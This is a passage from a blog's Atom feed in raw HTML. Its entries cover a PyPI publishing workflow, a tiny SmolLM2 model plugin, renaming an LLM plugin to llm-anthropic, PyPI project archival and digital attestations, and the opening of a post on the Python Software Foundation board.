&lt;p&gt;My cookiecutter template comes with &lt;a href="https://github.com/simonw/llm-smollm2/blob/main/.github/workflows/publish.yml"&gt;a GitHub Actions workflow&lt;/a&gt; that publishes the package to PyPI when a new release is created using the GitHub web interface. Here's the relevant YAML:&lt;/p&gt;
&lt;div class="highlight highlight-source-yaml"&gt;&lt;pre&gt;  &lt;span class="pl-ent"&gt;deploy&lt;/span&gt;:
    &lt;span class="pl-ent"&gt;runs-on&lt;/span&gt;: &lt;span class="pl-s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="pl-ent"&gt;needs&lt;/span&gt;: &lt;span class="pl-s"&gt;[test]&lt;/span&gt;
    &lt;span class="pl-ent"&gt;environment&lt;/span&gt;: &lt;span class="pl-s"&gt;release&lt;/span&gt;
    &lt;span class="pl-ent"&gt;permissions&lt;/span&gt;:
      &lt;span class="pl-ent"&gt;id-token&lt;/span&gt;: &lt;span class="pl-s"&gt;write&lt;/span&gt;
    &lt;span class="pl-ent"&gt;steps&lt;/span&gt;:
    - &lt;span class="pl-ent"&gt;uses&lt;/span&gt;: &lt;span class="pl-s"&gt;actions/checkout@v4&lt;/span&gt;
    - &lt;span class="pl-ent"&gt;name&lt;/span&gt;: &lt;span class="pl-s"&gt;Set up Python&lt;/span&gt;
      &lt;span class="pl-ent"&gt;uses&lt;/span&gt;: &lt;span class="pl-s"&gt;actions/setup-python@v5&lt;/span&gt;
      &lt;span class="pl-ent"&gt;with&lt;/span&gt;:
        &lt;span class="pl-ent"&gt;python-version&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;3.13&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
        &lt;span class="pl-ent"&gt;cache&lt;/span&gt;: &lt;span class="pl-s"&gt;pip&lt;/span&gt;
        &lt;span class="pl-ent"&gt;cache-dependency-path&lt;/span&gt;: &lt;span class="pl-s"&gt;pyproject.toml&lt;/span&gt;
    - &lt;span class="pl-ent"&gt;name&lt;/span&gt;: &lt;span class="pl-s"&gt;Install dependencies&lt;/span&gt;
      &lt;span class="pl-ent"&gt;run&lt;/span&gt;: &lt;span class="pl-s"&gt;|&lt;/span&gt;
&lt;span class="pl-s"&gt;        pip install setuptools wheel build&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;    - &lt;span class="pl-ent"&gt;name&lt;/span&gt;: &lt;span class="pl-s"&gt;Build&lt;/span&gt;
      &lt;span class="pl-ent"&gt;run&lt;/span&gt;: &lt;span class="pl-s"&gt;|&lt;/span&gt;
&lt;span class="pl-s"&gt;        python -m build&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;/span&gt;    - &lt;span class="pl-ent"&gt;name&lt;/span&gt;: &lt;span class="pl-s"&gt;Publish&lt;/span&gt;
      &lt;span class="pl-ent"&gt;uses&lt;/span&gt;: &lt;span class="pl-s"&gt;pypa/gh-action-pypi-publish@release/v1&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This runs after the &lt;code&gt;test&lt;/code&gt; job has passed. It uses the &lt;a href="https://github.com/pypa/gh-action-pypi-publish"&gt;pypa/gh-action-pypi-publish&lt;/a&gt; Action to publish to PyPI - I wrote more about how that works &lt;a href="https://til.simonwillison.net/pypi/pypi-releases-from-github"&gt;in this TIL&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="is-the-model-any-good-"&gt;Is the model any good?&lt;/h4&gt;
&lt;p&gt;This one really isn't! It's no great surprise, but it turns out 94MB isn't enough space for a model that can do anything useful.&lt;/p&gt;
&lt;p&gt;It's &lt;em&gt;super&lt;/em&gt; fun to play with, and I continue to maintain that small, weak models are a great way to help build a mental model of how this technology actually works.&lt;/p&gt;
&lt;p&gt;That's not to say SmolLM2 isn't a fantastic model family. I'm running the smallest, most restricted version here. &lt;a href="https://huggingface.co/blog/smollm"&gt;SmolLM - blazingly fast and remarkably powerful&lt;/a&gt; describes the full model family - which comes in 135M, 360M, and 1.7B sizes. The larger versions are a whole lot more capable.&lt;/p&gt;
&lt;p&gt;If anyone can figure out something genuinely useful to do with the 94MB version I'd love to hear about it.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pip"&gt;pip&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/plugins"&gt;plugins&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github-actions"&gt;github-actions&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/smollm"&gt;smollm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/o3"&gt;o3&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llama-cpp"&gt;llama-cpp&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="pip"/><category term="plugins"/><category term="projects"/><category term="pypi"/><category term="python"/><category term="ai"/><category term="github-actions"/><category term="generative-ai"/><category term="local-llms"/><category term="llms"/><category term="ai-assisted-programming"/><category term="llm"/><category term="gemini"/><category term="uv"/><category term="smollm"/><category term="o3"/><category term="llama-cpp"/></entry><entry><title>llm-anthropic</title><link href="https://simonwillison.net/2025/Feb/2/llm-anthropic/#atom-tag" rel="alternate"/><published>2025-02-02T06:17:53+00:00</published><updated>2025-02-02T06:17:53+00:00</updated><id>https://simonwillison.net/2025/Feb/2/llm-anthropic/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/llm-anthropic"&gt;llm-anthropic&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I've renamed my &lt;a href="https://github.com/simonw/llm-claude-3"&gt;llm-claude-3&lt;/a&gt; plugin to &lt;code&gt;llm-anthropic&lt;/code&gt;, on the basis that Claude 4 will probably happen at some point so this is a better name for the plugin.&lt;/p&gt;
&lt;p&gt;If you're a previous user of &lt;code&gt;llm-claude-3&lt;/code&gt; you can upgrade to the new plugin like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm install -U llm-claude-3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This should remove the old plugin and install the new one, because the latest &lt;code&gt;llm-claude-3&lt;/code&gt; depends on &lt;code&gt;llm-anthropic&lt;/code&gt;. Just installing &lt;code&gt;llm-anthropic&lt;/code&gt; may leave you with both plugins installed at once.&lt;/p&gt;
&lt;p&gt;There is one extra manual step you'll need to take during this upgrade: creating a new &lt;code&gt;anthropic&lt;/code&gt; stored key with the same API token you previously stored under &lt;code&gt;claude&lt;/code&gt;. You can do that like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm keys set anthropic --value "$(llm keys get claude)"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I released &lt;a href="https://github.com/simonw/llm-anthropic/releases/tag/0.12"&gt;llm-anthropic 0.12&lt;/a&gt; yesterday with new features not previously included in &lt;code&gt;llm-claude-3&lt;/code&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Support for Claude's &lt;a href="https://docs.anthropic.com/en/docs/build-with-claude/prompt-engineering/prefill-claudes-response"&gt;prefill&lt;/a&gt; feature, using the new &lt;code&gt;-o prefill '{'&lt;/code&gt; option and the accompanying &lt;code&gt;-o hide_prefill 1&lt;/code&gt; option to prevent the prefill from being included in the output text. &lt;a href="https://github.com/simonw/llm-anthropic/issues/2"&gt;#2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;New &lt;code&gt;-o stop_sequences '```'&lt;/code&gt; option for specifying one or more stop sequences. To specify multiple stop sequences, pass a JSON array of strings: &lt;code&gt;-o stop_sequences '["end", "stop"]'&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Model options are now documented in the README.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you install or upgrade &lt;code&gt;llm-claude-3&lt;/code&gt; you will now get &lt;code&gt;llm-anthropic&lt;/code&gt; instead, thanks to a tiny package on PyPI which depends on the new plugin name. I created that with my &lt;a href="https://github.com/simonw/pypi-rename"&gt;pypi-rename&lt;/a&gt; cookiecutter template.&lt;/p&gt;
&lt;p&gt;Here's the &lt;a href="https://github.com/simonw/llm-claude-3/issues/31"&gt;issue for the rename&lt;/a&gt;. I archived the &lt;a href="https://github.com/simonw/llm-claude-3"&gt;llm-claude-3 repository on GitHub&lt;/a&gt;, and got to use the brand new &lt;a href="https://simonwillison.net/2025/Jan/30/pypi-now-supports-project-archival/"&gt;PyPI archiving feature&lt;/a&gt; to archive the &lt;a href="https://pypi.org/project/llm-claude-3/"&gt;llm-claude-3 project on PyPI&lt;/a&gt; as well.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/plugins"&gt;plugins&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;&lt;/p&gt;



</summary><category term="plugins"/><category term="pypi"/><category term="python"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="llm"/><category term="anthropic"/><category term="claude"/></entry><entry><title>PyPI now supports project archival</title><link href="https://simonwillison.net/2025/Jan/30/pypi-now-supports-project-archival/#atom-tag" rel="alternate"/><published>2025-01-30T16:46:34+00:00</published><updated>2025-01-30T16:46:34+00:00</updated><id>https://simonwillison.net/2025/Jan/30/pypi-now-supports-project-archival/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.pypi.org/posts/2025-01-30-archival/"&gt;PyPI now supports project archival&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Neat new PyPI feature, similar to GitHub's &lt;a href="https://docs.github.com/en/repositories/archiving-a-github-repository/archiving-repositories"&gt;archiving repositories&lt;/a&gt; feature. You can now mark a PyPI project as "archived", making it clear that no new releases are planned (though you can switch back out of that mode later if you need to).&lt;/p&gt;
&lt;p&gt;I like the sound of these future plans around this topic:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Project archival is the first step in a larger project, aimed at improving the &lt;em&gt;lifecycle&lt;/em&gt; of projects on PyPI. That project includes evaluating additional project statuses (things like "deprecated" and "unmaintained"), as well as changes to &lt;a href="https://docs.pypi.org/api/"&gt;PyPI's public APIs&lt;/a&gt; that will enable clients to retrieve and act on project status information. You can track our progress on these fronts by following along with &lt;a href="https://github.com/pypi/warehouse/issues/16844"&gt;warehouse#16844&lt;/a&gt;!&lt;/p&gt;
&lt;/blockquote&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/psf"&gt;psf&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="python"/><category term="psf"/></entry><entry><title>Security means securing people where they are</title><link href="https://simonwillison.net/2024/Nov/19/securing-people-where-they-are/#atom-tag" rel="alternate"/><published>2024-11-19T01:36:35+00:00</published><updated>2024-11-19T01:36:35+00:00</updated><id>https://simonwillison.net/2024/Nov/19/securing-people-where-they-are/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.yossarian.net/2024/11/18/Security-means-securing-people-where-they-are"&gt;Security means securing people where they are&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
William Woodruff is an Engineering Director at Trail of Bits who worked on the recent PyPI &lt;a href="https://simonwillison.net/2024/Nov/14/pypi-digital-attestations/"&gt;digital attestations project&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;That feature is based around open standards but launched with an implementation against GitHub, which resulted in push back (and even some conspiracy theories) that PyPI were deliberately favoring GitHub over other platforms.&lt;/p&gt;
&lt;p&gt;William argues here for pragmatism over ideology:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Being serious about security at scale means &lt;strong&gt;meeting users where they are&lt;/strong&gt;. In practice, this means deciding how to divide a &lt;strong&gt;limited pool of engineering resources&lt;/strong&gt; such that the &lt;strong&gt;largest demographic of users benefits&lt;/strong&gt; from a security initiative. This results in a &lt;strong&gt;fundamental bias&lt;/strong&gt; towards institutional and pre-existing services, since the average user belongs to these institutional services and does not personally particularly care about security. Participants in open source &lt;strong&gt;can and should&lt;/strong&gt; work to counteract this institutional bias, but doing so as a matter of &lt;strong&gt;ideological purity undermines our shared security interests.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://lobste.rs/s/tw8f63/security_means_securing_people_where"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;&lt;/p&gt;



</summary><category term="github"/><category term="pypi"/><category term="python"/><category term="security"/></entry><entry><title>PyPI now supports digital attestations</title><link href="https://simonwillison.net/2024/Nov/14/pypi-digital-attestations/#atom-tag" rel="alternate"/><published>2024-11-14T19:56:49+00:00</published><updated>2024-11-14T19:56:49+00:00</updated><id>https://simonwillison.net/2024/Nov/14/pypi-digital-attestations/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.pypi.org/posts/2024-11-14-pypi-now-supports-digital-attestations/"&gt;PyPI now supports digital attestations&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Dustin Ingram:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;PyPI package maintainers can now publish signed digital attestations when publishing, in order to further increase trust in the supply-chain security of their projects. Additionally, a new API is available for consumers and installers to verify published attestations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This has been in the works for a while, and is another component of PyPI's approach to supply chain security for Python packaging - see &lt;a href="https://peps.python.org/pep-0740/"&gt;PEP 740 – Index support for digital attestations&lt;/a&gt; for all of the underlying details.&lt;/p&gt;
&lt;p&gt;A key problem this solves is cryptographically linking packages published on PyPI to the exact source code that was used to build those packages. In the absence of this feature there are no guarantees that the &lt;code&gt;.tar.gz&lt;/code&gt; or &lt;code&gt;.whl&lt;/code&gt; file you download from PyPI hasn't been tampered with (to add malware, for example) in a way that's not visible in the published source code.&lt;/p&gt;
&lt;p&gt;These new attestations provide a mechanism for proving that a known, trustworthy build system was used to generate and publish the package, starting with its source code on GitHub.&lt;/p&gt;
&lt;p&gt;The good news is that if you're using the PyPI Trusted Publishers mechanism in GitHub Actions to publish packages, you're already using this new system. I wrote about that system in January: &lt;a href="https://simonwillison.net/2024/Jan/16/python-lib-pypi/"&gt;Publish Python packages to PyPI with a python-lib cookiecutter template and GitHub Actions&lt;/a&gt; - and hundreds of my own PyPI packages are already using that system, thanks to my various cookiecutter templates.&lt;/p&gt;
&lt;p&gt;Trail of Bits helped build this feature, and provide extra background about it on their own blog in &lt;a href="https://blog.trailofbits.com/2024/11/14/attestations-a-new-generation-of-signatures-on-pypi/"&gt;Attestations: A new generation of signatures on PyPI&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://github.com/pypa/gh-action-pypi-publish/releases/tag/v1.11.0"&gt;As of October 29&lt;/a&gt;, attestations are the default for anyone using Trusted Publishing via the &lt;a href="https://github.com/marketplace/actions/pypi-publish"&gt;PyPA publishing action for GitHub&lt;/a&gt;. That means roughly 20,000 packages can now attest to their provenance &lt;em&gt;by default&lt;/em&gt;, with no changes needed.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;They also built &lt;a href="https://trailofbits.github.io/are-we-pep740-yet/"&gt;Are we PEP 740 yet?&lt;/a&gt; (&lt;a href="https://github.com/trailofbits/are-we-pep740-yet/blob/a87a8895dd238d14af50aaa2675c81060aa52846/utils.py#L31-L72"&gt;key implementation here&lt;/a&gt;) to track the rollout of attestations across the 360 most downloaded packages from PyPI. It works by hitting URLs such as &lt;a href="https://pypi.org/simple/pydantic/"&gt;https://pypi.org/simple/pydantic/&lt;/a&gt; with a &lt;code&gt;Accept: application/vnd.pypi.simple.v1+json&lt;/code&gt; header - &lt;a href="https://gist.github.com/simonw/8cf8a850739e2865cf3b9a74e6461b28"&gt;here's the JSON that returns&lt;/a&gt;.&lt;/p&gt;
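&lt;p&gt;As a sketch of what that check involves: each file entry in the JSON Simple API response carries a provenance indicator that is null when no attestation exists. The field name and response shape below are my assumption based on the PEP 740-era API and are heavily trimmed for illustration, so check the PyPI API docs before relying on them:&lt;/p&gt;

```python
import json

# Hypothetical, heavily trimmed response in the style of
# application/vnd.pypi.simple.v1+json; real responses have many more
# fields and the provenance URL here is invented for illustration.
sample = json.loads("""
{
  "name": "pydantic",
  "files": [
    {"filename": "pydantic-2.0-py3-none-any.whl",
     "provenance": "https://pypi.org/integrity/..."},
    {"filename": "pydantic-1.0.tar.gz",
     "provenance": null}
  ]
}
""")

# Files with a non-null provenance entry have published attestations.
attested = [f["filename"] for f in sample["files"] if f.get("provenance")]
print(attested)  # ['pydantic-2.0-py3-none-any.whl']
```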
&lt;p&gt;I published an alpha package using Trusted Publishers last night and the &lt;a href="https://pypi.org/project/llm/0.18a0/#llm-0.18a0-py3-none-any.whl"&gt;files for that release&lt;/a&gt; are showing the new provenance information already:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Provenance. The following attestation bundles were made for llm-0.18a0-py3-none-any.whl: Publisher: publish.yml on simonw/llm Attestations: Statement type: https://in-toto.io/Statement/v1 Predicate type: https://docs.pypi.org/attestations/publish/v1 Subject name: llm-0.18a0-py3-none-any.whl Subject digest: dde9899583172e6434971d8cddeb106bb535ae4ee3589cb4e2d525a4526976da Sigstore transparency entry: 148798240 Sigstore integration time: about 18 hours ago" src="https://static.simonwillison.net/static/2024/provenance.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Which links to &lt;a href="https://search.sigstore.dev/?logIndex=148798240"&gt;this Sigstore log entry&lt;/a&gt; with more details, including &lt;a href="https://github.com/simonw/llm/tree/041730d8b2bc12f62cfe41c44b62a03ef4790117"&gt;the Git hash&lt;/a&gt; that was used to build the package:&lt;/p&gt;
&lt;p&gt;&lt;img alt="X509v3 extensions:   Key Usage (critical):   - Digital Signature   Extended Key Usage:   - Code Signing   Subject Key Identifier:   - 4E:D8:B4:DB:C1:28:D5:20:1A:A0:14:41:2F:21:07:B4:4E:EF:0B:F1   Authority Key Identifier:     keyid: DF:D3:E9:CF:56:24:11:96:F9:A8:D8:E9:28:55:A2:C6:2E:18:64:3F   Subject Alternative Name (critical):     url:     - https://github.com/simonw/llm/.github/workflows/publish.yml@refs/tags/0.18a0   OIDC Issuer: https://token.actions.githubusercontent.com   GitHub Workflow Trigger: release   GitHub Workflow SHA: 041730d8b2bc12f62cfe41c44b62a03ef4790117   GitHub Workflow Name: Publish Python Package   GitHub Workflow Repository: simonw/llm   GitHub Workflow Ref: refs/tags/0.18a0   OIDC Issuer (v2): https://token.actions.githubusercontent.com   Build Signer URI: https://github.com/simonw/llm/.github/workflows/publish.yml@refs/tags/0.18a0   Build Signer Digest: 041730d8b2bc12f62cfe41c44b62a03ef4790117" src="https://static.simonwillison.net/static/2024/sigstore.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.sigstore.dev/"&gt;Sigstore&lt;/a&gt; is a transparency log maintained by &lt;a href="https://en.wikipedia.org/wiki/Open_Source_Security_Foundation"&gt;Open Source Security Foundation (OpenSSF)&lt;/a&gt;, a sub-project of the Linux Foundation.

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=42136375"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github-actions"&gt;github-actions&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/psf"&gt;psf&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/dustin-ingram"&gt;dustin-ingram&lt;/a&gt;&lt;/p&gt;



</summary><category term="github"/><category term="packaging"/><category term="pypi"/><category term="python"/><category term="github-actions"/><category term="psf"/><category term="supply-chain"/><category term="dustin-ingram"/></entry><entry><title>Things I've learned serving on the board of the Python Software Foundation</title><link href="https://simonwillison.net/2024/Sep/18/board-of-the-python-software-foundation/#atom-tag" rel="alternate"/><published>2024-09-18T14:15:37+00:00</published><updated>2024-09-18T14:15:37+00:00</updated><id>https://simonwillison.net/2024/Sep/18/board-of-the-python-software-foundation/#atom-tag</id><summary type="html">
    &lt;p&gt;Two years ago &lt;a href="https://simonwillison.net/2022/Jul/30/psf-board/"&gt;I was elected&lt;/a&gt; to the board of directors for the &lt;a href="https://www.python.org/psf-landing/"&gt;Python Software Foundation&lt;/a&gt; - the PSF. I recently returned from the annual PSF board retreat (this one was in Lisbon, Portugal) and this feels like a good opportunity to write up some of the things I've learned along the way.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href="#what-is-the-psf"&gt;What is the PSF?&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#the-psf-employs-staff"&gt;The PSF employs staff&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#a-lot-of-this-is-about-money"&gt;A lot of this is about money&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#the-psf-does-not-directly-develop-python-itself"&gt;The PSF does not directly develop Python itself&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#pypi-the-python-package-index"&gt;PyPI - the Python Package Index&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#pycon-is-a-key-commitment"&gt;PyCon is a key commitment&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#other-psf-activities"&gt;Other PSF activities&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#work-groups"&gt;Work Groups&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#acting-as-a-fiscal-sponsor"&gt;Acting as a fiscal sponsor&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#life-as-a-board-member"&gt;Life as a board member&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#the-kinds-of-things-the-board-talks-about"&gt;The kinds of things the board talks about&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="#want-to-know-more-"&gt;Want to know more?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id="what-is-the-psf"&gt;What is the PSF?&lt;/h4&gt;
&lt;p&gt;The PSF is a &lt;a href="https://en.wikipedia.org/wiki/501(c)(3)_organization"&gt;US 501(c)(3)&lt;/a&gt; non-profit organization with the following &lt;a href="https://www.python.org/psf/mission/"&gt;mission&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The mission of the Python Software Foundation is to promote, protect, and advance the Python programming language, and to support and facilitate the growth of a diverse and international community of Python programmers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That mission definition is &lt;em&gt;really important&lt;/em&gt;. Board members and paid staff come and go, but the mission remains constant - it's the single most critical resource to help make decisions about whether the PSF should be investing time, money and effort into an activity or not.&lt;/p&gt;
&lt;p&gt;The board's 501(c)(3) status is predicated on following the &lt;a href="https://www.python.org/psf/mission/"&gt;full expanded mission statement&lt;/a&gt;. When our finances get audited (we conduct an annual "friendly audit", which is considered best practice for organizations at our size), the auditors need to be able to confirm that we've been supporting that mission through our management of the tax-exempt funds that have been entrusted to us.&lt;/p&gt;
&lt;p&gt;This auditability is an interesting aspect of how 501(c)(3) organizations work, because it means you can donate funds to them and know that the IRS will ostensibly be ensuring that the money is spent in a way that supports their stated mission.&lt;/p&gt;
&lt;p&gt;Board members have fiduciary responsibility for the PSF. A good explanation of this can be found &lt;a href="https://boardsource.org/resources/fiduciary-responsibilities/"&gt;here on BoardSource&lt;/a&gt;, which also has other useful resources for understanding &lt;a href="https://boardsource.org/fundamental-topics-of-nonprofit-board-service/roles-responsibilities/"&gt;the roles and responsibilities&lt;/a&gt; of non-profit board members.&lt;/p&gt;
&lt;p&gt;(Developing at least a loose intuition for US tax law around non-profits is one of the many surprising things that are necessary to be an effective board member.)&lt;/p&gt;
&lt;h4 id="the-psf-employs-staff"&gt;The PSF employs staff&lt;/h4&gt;
&lt;p&gt;The PSF currently employs &lt;a href="https://www.python.org/psf/records/staff/"&gt;12 full-time staff members&lt;/a&gt;. Members of the board do not directly manage the activities of the staff - in fact board members telling staff what to do is highly inappropriate.&lt;/p&gt;
&lt;p&gt;Instead, the board is responsible for hiring an Executive Director - currently Deb Nicholson - who is then responsible for hiring and managing (directly or indirectly) those other staff members. The board is responsible for evaluating the Executive Director's performance.&lt;/p&gt;
&lt;p&gt;I joined the board shortly after Deb was hired, so I have not personally been part of a board hiring committee for a new Executive Director.&lt;/p&gt;
&lt;p&gt;While paid staff support and enact many of the activities of the PSF, the foundation is fundamentally a volunteer-based organization. Many PSF activities are carried out by &lt;a href="https://www.python.org/psf/volunteer/"&gt;these volunteers&lt;/a&gt;, in particular via &lt;a href="#work-groups"&gt;Work Groups&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="a-lot-of-this-is-about-money"&gt;A lot of this is about money&lt;/h4&gt;
&lt;p&gt;A grossly simplified way to think about the PSF is that it's a bucket of money that is raised from &lt;a href="https://www.python.org/psf/sponsors/"&gt;sponsors&lt;/a&gt; and the Python community (via donations and membership fees), and then spent to support the community and the language in different ways.&lt;/p&gt;
&lt;p&gt;The PSF spends money on staff, on grants to Python-related causes and on infrastructure and activities that support Python development and the Python community itself.&lt;/p&gt;
&lt;p&gt;You can see how that money has been spent in the &lt;a href="https://www.python.org/psf/annual-report/2023/"&gt;2023 Annual Impact Report&lt;/a&gt;. The PSF had $4,356,000 revenue for that year and spent $4,508,000 - running a small loss, but not a concerning one given our assets from previous years.&lt;/p&gt;
&lt;p&gt;The most significant categories of expenditure in 2023 were PyCon US ($1,800,000), our Grants program ($677,000), Infrastructure (including PyPI) ($286,000) and our Fiscal Sponsorees ($204,000) - I'll describe these in more detail below.&lt;/p&gt;
&lt;h4 id="the-psf-does-not-directly-develop-python-itself"&gt;The PSF does not directly develop Python itself&lt;/h4&gt;
&lt;p&gt;This is an important detail to understand. The PSF is responsible for protecting and supporting the Python language and community, but development of &lt;a href="https://github.com/python/cpython"&gt;CPython&lt;/a&gt; itself is not directly managed by the PSF.&lt;/p&gt;
&lt;p&gt;Python development is handled by the &lt;a href="https://devguide.python.org/core-developers/developer-log/"&gt;Python core team&lt;/a&gt;, who are governed by the 5-person &lt;a href="https://github.com/python/steering-council/blob/main/README.md"&gt;Python Steering Council&lt;/a&gt;. The Steering Council is elected by the core team. The process for becoming a core developer &lt;a href="https://devguide.python.org/core-developers/become-core-developer/"&gt;is described here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;How this all works is defined by &lt;a href="https://peps.python.org/pep-0013/"&gt;PEP 13: Python Language Governance&lt;/a&gt; (and several subsequent PEPs). This structure was created - with much discussion - after Guido van Rossum stepped down from his role as Python BDFL in 2018.&lt;/p&gt;
&lt;p&gt;The PSF's executive director maintains close ties with the steering council, meeting with them 2-3 times a month. The PSF provides financial support for some Python core activities, such as infrastructure used for Python development and sponsoring travel to and logistics for core Python sprints.&lt;/p&gt;
&lt;p&gt;More recently, the PSF has started employing Developers in Residence to directly support the work of both the core Python team and initiatives such as the Python Package Index.&lt;/p&gt;
&lt;h4 id="pypi-the-python-package-index"&gt;PyPI - the Python Package Index&lt;/h4&gt;
